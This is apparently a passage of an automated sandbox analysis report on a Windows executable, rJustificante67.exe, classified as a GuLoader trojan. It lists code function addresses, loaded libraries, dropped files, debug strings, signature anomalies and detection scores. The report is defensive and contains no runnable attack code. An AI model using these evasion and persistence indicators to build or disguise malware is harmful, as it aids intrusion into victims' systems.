Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1C9A	6_2_016E1C9A
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0C92	6_2_016E0C92
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E176E	6_2_016E176E
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E136D	6_2_016E136D
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0F69	6_2_016E0F69
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1F63	6_2_016E1F63
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0B78	6_2_016E0B78
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0B4F	6_2_016E0B4F
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1B4F	6_2_016E1B4F
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E134C	6_2_016E134C
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0F48	6_2_016E0F48
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1F48	6_2_016E1F48
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1741	6_2_016E1741
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0B2D	6_2_016E0B2D
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E172A	6_2_016E172A
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1B20	6_2_016E1B20
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1F3C	6_2_016E1F3C
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E2338	6_2_016E2338
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1335	6_2_016E1335
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1F0B	6_2_016E1F0B
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1309	6_2_016E1309
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1B09	6_2_016E1B09
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0B03	6_2_016E0B03
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E231A	6_2_016E231A
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0F15	6_2_016E0F15
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1BE0	6_2_016E1BE0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E13FF	6_2_016E13FF
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1BFF	6_2_016E1BFF
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0FFC	6_2_016E0FFC
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1FF7	6_2_016E1FF7
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E17F1	6_2_016E17F1
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E13CD	6_2_016E13CD
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1FCA	6_2_016E1FCA
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E07C2	6_2_016E07C2
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E17C0	6_2_016E17C0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0FC1	6_2_016E0FC1
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E07DF	6_2_016E07DF
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0BDD	6_2_016E0BDD
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E17D7	6_2_016E17D7
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0FD5	6_2_016E0FD5
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E07AC	6_2_016E07AC
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E13AD	6_2_016E13AD
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0BAB	6_2_016E0BAB
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1FA7	6_2_016E1FA7
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1BB0	6_2_016E1BB0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1F80	6_2_016E1F80
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1392	6_2_016E1392
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1793	6_2_016E1793
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E166C	6_2_016E166C
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1A6A	6_2_016E1A6A
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E2267	6_2_016E2267
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1E7B	6_2_016E1E7B
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0E78	6_2_016E0E78
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0A71	6_2_016E0A71
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1A4D	6_2_016E1A4D
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0E5B	6_2_016E0E5B
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1259	6_2_016E1259
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1657	6_2_016E1657
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1E57	6_2_016E1E57
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0A50	6_2_016E0A50
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E162A	6_2_016E162A
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0A2A	6_2_016E0A2A
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0E2B	6_2_016E0E2B
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0A25	6_2_016E0A25
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E223D	6_2_016E223D
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1E3A	6_2_016E1E3A
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1234	6_2_016E1234
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1A32	6_2_016E1A32
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E160F	6_2_016E160F
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1208	6_2_016E1208
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0A09	6_2_016E0A09
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E2218	6_2_016E2218
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1A17	6_2_016E1A17
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1E11	6_2_016E1E11
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1AE9	6_2_016E1AE9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E12E0	6_2_016E12E0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0AE1	6_2_016E0AE1
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E16FC	6_2_016E16FC
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0EF7	6_2_016E0EF7
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E22F4	6_2_016E22F4
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1EF5	6_2_016E1EF5
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E22CA	6_2_016E22CA
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0AC9	6_2_016E0AC9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0EC9	6_2_016E0EC9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1AC6	6_2_016E1AC6
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E16D8	6_2_016E16D8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1ED2	6_2_016E1ED2
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1EA8	6_2_016E1EA8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0EA9	6_2_016E0EA9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E22A9	6_2_016E22A9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E12A1	6_2_016E12A1
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E128E	6_2_016E128E
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E168D	6_2_016E168D
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E2286	6_2_016E2286
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1A98	6_2_016E1A98
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0A99	6_2_016E0A99
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_025E3AA1	6_2_025E3AA1
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_025E29EC	6_2_025E29EC

Source: C:\Users\user\Desktop\rJustificante67.exe

Code function: String function: 00402AD0 appears 51 times

Source: C:\Users\user\Desktop\rJustificante67.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 2548

Source: rJustificante67.exe

Static PE information: invalid certificate

Source: rJustificante67.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal88.troj.evad.winEXE@4/22@3/3

Source: C:\Users\user\Desktop\rJustificante67.exe

Code function: 0_2_0040458C GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040458C

Source: C:\Users\user\Desktop\rJustificante67.exe

Code function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_0040206A

Source: C:\Users\user\Desktop\rJustificante67.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister

Jump to behavior

Source: C:\Users\user\Desktop\rJustificante67.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3428

Source: C:\Users\user\Desktop\rJustificante67.exe

File created: C:\Users\user\AppData\Local\Temp\nsv7249.tmp

Jump to behavior

Source: rJustificante67.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\rJustificante67.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\rJustificante67.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: rJustificante67.exe	ReversingLabs: Detection: 32%
Source: rJustificante67.exe	Virustotal: Detection: 23%

Source: C:\Users\user\Desktop\rJustificante67.exe

File read: C:\Users\user\Desktop\rJustificante67.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\rJustificante67.exe "C:\Users\user\Desktop\rJustificante67.exe"
Source: C:\Users\user\Desktop\rJustificante67.exe	Process created: C:\Users\user\Desktop\rJustificante67.exe "C:\Users\user\Desktop\rJustificante67.exe"
Source: C:\Users\user\Desktop\rJustificante67.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 2548
Source: C:\Users\user\Desktop\rJustificante67.exe	Process created: C:\Users\user\Desktop\rJustificante67.exe "C:\Users\user\Desktop\rJustificante67.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: dhcpcsvc.dll	Jump to behavior

Source: C:\Users\user\Desktop\rJustificante67.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: stempelpudernes.lnk.0.dr	LNK file: ..\Pictures\muringerne\giggliest.pha
Source: dinosaurusserne.lnk.0.dr	LNK file: ..\..\..\..\Users\Public\Pictures\eksistensberettigelsen.pre

Source: C:\Users\user\Desktop\rJustificante67.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: rJustificante67.exe, 00000006.00000002.2732658686.00000000029F6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: rJustificante67.exe, 00000006.00000002.2732658686.00000000029F6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER4393.tmp.dmp.9.dr
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: rJustificante67.exe, 00000006.00000002.2759816390.0000000032CB7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdbd source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdbFg# source: rJustificante67.exe, 00000006.00000002.2760342209.00000000357B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: rJustificante67.exe, 00000006.00000002.2732658686.00000000029F6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdb source: rJustificante67.exe, 00000006.00000002.2760384709.000000003580E000.00000004.00000020.00020000.00000000.sdmp, WER4393.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: rJustificante67.exe, 00000006.00000002.2732658686.00000000029F6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\rJustificante67.PDBXs< source: rJustificante67.exe, 00000006.00000002.2760342209.00000000357B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: rJustificante67.exe, 00000006.00000002.2760342209.00000000357B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: 5%%.pdb source: rJustificante67.exe, 00000006.00000002.2759816390.0000000032CB7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER4393.tmp.dmp.9.dr
Source:	Binary string: C:\Users\user\Desktop\rJustificante67.PDB source: rJustificante67.exe, 00000006.00000002.2759816390.0000000032CB7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER4393.tmp.dmp.9.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000006.00000002.2730568468.000000000185C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2612554748.000000000333C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\rJustificante67.exe

Code function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040620C

Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_10002D50 push eax; ret	0_2_10002D7E
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E5162 push es; iretd	6_2_016E5170
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E5174 push ss; retf	6_2_016E51D9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E6944 pushad ; iretd	6_2_016E6945
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E4938 push 96898B87h; ret	6_2_016E493F
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E2C7F push es; ret	6_2_016E2C87
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E58ED push es; retf	6_2_016E58F3
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E68AE push ss; retf	6_2_016E68CD
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E2C8B push es; ret	6_2_016E2C87
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E472A push dword ptr [ecx+7Eh]; ret	6_2_016E4738

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer matches subject exactly) which is not trusted by system. 2) Organization 'Bevismateriales' is not a known legitimate company. 3) Email domain 'Carbolxylol.Vau' is highly suspicious and not a legitimate business domain. 4) Large time gap between compilation date (2013) and certificate creation (2024) suggests possible tampering. 5) The OU field 'Tegnvise servicekontrakter' appears to be in Danish/Norwegian while location is in Wales, GB - showing inconsistency. 6) Certificate validation explicitly fails with untrusted root error. 7) Organization name 'Bevismateriales' appears to be a mix of different languages, which is highly unusual for a legitimate business. The combination of self-signed certificate, suspicious domain, failed validation, and inconsistent location/language patterns strongly suggests this is a malicious file.

Source: C:\Users\user\Desktop\rJustificante67.exe

File created: C:\Users\user\AppData\Local\Temp\nsc77E8.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
